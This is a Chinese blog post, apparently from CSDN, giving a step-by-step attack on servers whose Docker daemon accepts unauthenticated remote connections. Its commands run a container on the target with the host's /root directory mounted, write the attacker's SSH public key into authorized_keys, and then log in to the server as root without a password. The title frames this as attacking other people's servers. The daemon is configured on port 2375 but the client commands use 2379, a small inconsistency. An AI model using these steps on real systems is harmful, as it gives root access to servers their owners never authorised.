利用docker漏洞攻击别人服务器

已于 2023-12-15 15:23:43 修改
阅读量562 收藏
点赞数 2
分类专栏: 分享 文章标签: docker 安全漏洞
于 2021-06-30 16:01:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youth_shouting/article/details/118363024
版权
前言
  • 通过docker的远程服务向服务器的ssh写入本机公钥实现免密登录。
实现原理

  • docker开启了远程访问服务

  • 服务器有ssh服务(一般都有)

  • docker开启了远程服务之后通过docker的挂载功能将root/.ssh/目录挂载到docker容器中然后将本机公钥写authorized_keys中,即可实现ssh免密登录

实现过程
  • docker开启远程服务
vim /lib/system/system/docker.service
# 修改ExecStart
ExecStart=/usr/bin/dockerd  -H tcp://0.0.0.0:2375  -H unix:///var/run/docker.sock
# 重启docker
systemctl daemon-reload
systemctl restart docker

从虚拟机或者其它服务器远程操作docker

docker -H tcp://xxx.xxx.xxx.xxx:2379 ps -a

可以看到远程主机上的docker容器了

平时我们都是使用docker ps来查看本机运行的容器,这里使用-H,指定A主机的IP和端口,即可以查看远程主机的。

  • 启动一个centos镜像
# 拉取镜像
docker -H tcp://xxx.xxx.xxx.xxx:2379 pull centos
# 启动容器并进入容器bash
docker -H tcp://47.102.xxx.xxx:2379 run -it -v /root:/tmp/root centos bash
  • 复制自己的公钥
    在这里插入图片描述
    再次进入docker容器bash,找到.ssh文件,没有的自己创建一个
# 进入/tmp/root下(相当于系统的root目录,因为root挂载到了tmp/root下)
cd /tmp/root
# 没有.ssh目录创建
mkdir .ssh
cd .ssh
# 没有authorized_keys文件,自己创建,将公钥添写进文件中退出
vi authorized_keys
  • 使用ssh连接服务器
ssh xxx.xxx.xxx.xxx
# 发现不要密码 直接进去了

喜欢点个赞
留个群
在这里插入图片描述

会写代码的青蛙
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux docker局域网访问,如何从局域网上的另一台机器访问Docker容器
weixin_33603105的博客
05-15 1811
我正在使用适用于Mac的Docker Desktop,并在主机上运行容器.我可以通过主机上的localhost访问容器.但是它不能从局域网上的其他系统获得.容器是nginx Web服务器,可以在localhost:80上访问,但不能从同一LAN网络上的其他系统访问.我希望其他系统能够访问主机上的容器.编辑1:添加docker-compose配置和“ docker info”命令输出version:...
10: docker 主机远程访问另一台docker 主机
xiaoliuliu2050的专栏
12-03 7343
我们可以从一台安装了docker的机器访问另一台安装了docker的机器。一般情况下我们使用当前机器的docker客户端访问当前机器的Server端。下面演示如何访问其他docker服务端。 第一台IP:192.168.12.3 第二台IP:192.168.12.4 使用第二台安装有docker服务器做演示。为区分,设置label不同。 修改守护进程(Server
docker跨主机服务器访问,配置route
ccsd11的博客
06-25 612
假设A服务器(192.168.1.2)中的docker需要访问B服务器(192.168.1.3)中的容器服务。1.在B服务器docker-compose中配置networks。2.在A服务中添加访问路由。ps.请牢记下面的内容。
使用docker 容器 跨主机访问--实操
菜鸟博客
05-14 6152
背景: 引出思考问题一: 在学习docker 服务的过程中想到一个问题,就是所有的docker 容器服务都部署在一台docker 宿主机上,若docker 容器服务足够多 这个docker 宿主机不会死掉么?? 引出思考问题二: docker 容器里面的服务能不能跨宿主机访问别一台宿主机的docker 容器服务呢?? 问题一: 其实我自己也不知道 问题二: 请看实战操作二的内容 实战: 操作一: 安装docker 引擎,操作链接: 操作二: 一.实验条件准备: 1. 准备两台l..
docker容器服务访问另一台mysql服务器
绅士jiejie的博客
04-27 1130
都是阿里云产品,没什么特殊的,只需要将docker容器服务所在的服务器ip地址加入白名单即可。
exploit-CVE-2016-7434:NTPD远程DOS漏洞利用和易受攻击的容器
02-05
CVE-2016-7434 ntpd DOS攻击 Ntpd具有空指针引用,该引用可能触发崩溃的应用程序。 根据NTP.org的说法,“如果将ntpd... 可以在找到读取MRU列表的例程( read_mru_list ), 利用脆弱的形象如果您希望有漏洞的系统测试
TCP协议漏洞利用的问题与解决记录1
08-03
TCP协议漏洞利用的问题与解决记录1 TCP协议漏洞利用的问题与解决记录1是指在计算机网络中,...这篇文章总结了TCP协议漏洞利用的问题与解决记录1,探讨了SYN洪泛攻击的原理和防御机制,并提供了相关命令和Scapy脚本。
php-dos-attack:利用PHP的json_decode漏洞
05-13
在PHP服务器上模拟哈希冲突攻击 签出。 这个怎么运作 PHP哈希表容易受到复杂性攻击。 因此,每个需要外部输入并在PHP哈希表中进行解析的函数都容易受到复杂性攻击。 测试PHP漏洞以进行碰撞攻击 在目录test ,有PHP...
桌面应用程序:用Rust编写的非官方Bitwarden兼容服务器
最新发布
03-04
这涉及选择合适的服务器平台(如Docker容器、Kubernetes集群),配置负载均衡和监控系统,以及设置自动备份和恢复策略。 7. **持续集成/持续部署(CI/CD)**: 使用像GitLab CI/CD或Jenkins这样的工具,可以自动化...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
使用这些检测工具,用户可以快速定位并解决Log4j2漏洞,防止恶意攻击利用漏洞对系统进行控制。重要的是,不仅要运行这些工具,还应结合其他安全措施,例如更新到最新的Log4j2补丁版本,审查和加固日志配置,以及...
Navicat Premium登陆云服务器Docker-Mongo容器
The limits of your knowledge are the limits of your world
12-12 238
Navicat Premium登陆云服务下的Docker MongoDB镜像数据库
服务器安装Docker-Linux并配置远程登录
人间世
07-22 2515
一、前言 一直都有听说Docker,被传的神乎其神的,所以很早之前就想见识见识庐山真面目了 前几天做实验,服务器装的Centos7,环境实在是太落后,不想折腾环境了,于是正好趁此机会安装一下Docker(没错,我走向了另一条折腾之路~V~) 二、Linux安装Docker 本来以为安装Docker又会是一条折腾不归路,但是安装Docker的过程却顺利的让我惊奇,这也是我对Docker赞叹不已的原因之一 Centos 1、升级包 sudo yum update -y 2、安装Docker sudo yum
跨主机访问——docker
shengyin714959的博客
12-09 607
默认名为ingress 的overlay driver是默认是不支持standalone容器加入的,所以我需要重新new一个overlay,并设置一下允许standalone容器加入此网络,好了,当你有若干个容器之后,你可能就希望实现容器的跨机部署访问了,比如aspnetcore在一台host上,mysql在另外一个host上,如果要实现这样的功能,需要你。下面要注意的是,在redis的构造函数中指定了host= some-redis ,也就是 147启动容器名。有了这三个,接下来就可以构建image了。
使用docker创建一个服务器并用ssh登录
who7708的专栏
02-18 299
使用docker创建一个服务器并用ssh登录 运行 ubuntu docker run -it --rm --name test -h test -m 500m ubuntu:18.04 /bin/bash 修改密码 默认是root用户,没有密码的。使用 passwd 修改密码 替换源 https://developer.aliyun.com/mirror/ubuntu 找到对应的版本,进行替换 更新系统 apt update 安装和配置ssh服务 安装 apt install openssh-ser
【容器安全防线】Docker攻击方式与防范技术探究
wangluoanquan111的博客
07-29 359
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。一个完整的Docker有以下几个部分组成:1、DockerClient客户端2、Docker Daemon守护进程3、Docker Image镜像4、DockerContainer容器。
docker基本操作:安装部署、设置ssh远程登入、配置docker镜像文件并创建docker容器
HaveAGoodDay428的博客
03-17 3129
docker基本操作:安装部署、设置ssh远程登入、配置docker镜像文件并创建docker容器
操作系统远程如何登录docker
12-27 364
操作系统远程如何登录docker 远程如何登录dockerdocker容器考虑远程连接,可以通过putty或者xshell来连接。 这里以Win10系统,docker:Version 17.06.0-ce-win19 (12801)为例,来进行介绍。 容器管理:kitematic for windows 远程连接工具:xshell 容器系统:ubuntu 一、下载ubuntu容器 从ketematic中下载官方最新版ubuntu 二、准备工作 因为新装的官方ubuntu中很多命令都没
Harbor+docker的基本使用
qq_38129681的博客
11-23 1100
harbor+docker的使用
进入Docker容器的4种方式
诗筱涵的博客
02-19 6357
摘自:https://www.cnblogs.com/xhyan/p/6593075.html Docker容器进入的4种方式 Docker容器进入的4种方式   在使用Docker创建了容器之后,大家比较关心的就是如何进入该容器了,其实进入Docker容器有好几多种方式,这里我们就讲一下常用的几种进入Docker容器的方法。 进入Docker容器比较常见的几种做法如下: 使用docker attach 使用SSH 使用nsenter 使用exec 一、使用docker attach.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值